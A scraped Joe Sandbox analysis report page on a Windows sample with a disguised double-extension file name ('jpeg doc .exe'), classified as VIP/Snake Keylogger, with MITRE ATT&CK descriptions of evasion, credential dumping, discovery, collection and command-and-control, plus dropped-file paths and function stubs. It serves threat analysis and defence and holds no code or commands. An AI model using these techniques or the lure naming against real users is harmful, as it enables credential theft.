Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_druo5hmv.kcx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_katgu54e.fky.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lof0dgap.dzt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiqgnnyx.up1.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Function 069A2350 Relevance: 9.5, Strings: 5, Instructions: 3256
COMMON

Function 06A11170 Relevance: 3.3, Instructions: 3299
COMMON

Function 069AEE68 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Function 06A97C1C Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 06A97C28 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 069A5C00 Relevance: 1.7, Strings: 1, Instructions: 471
COMMON

Function 00C2B6C0 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Function 069AC820 Relevance: 1.7, Strings: 1, Instructions: 437
COMMON

Function 00C244C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 00C2590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 075F018C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre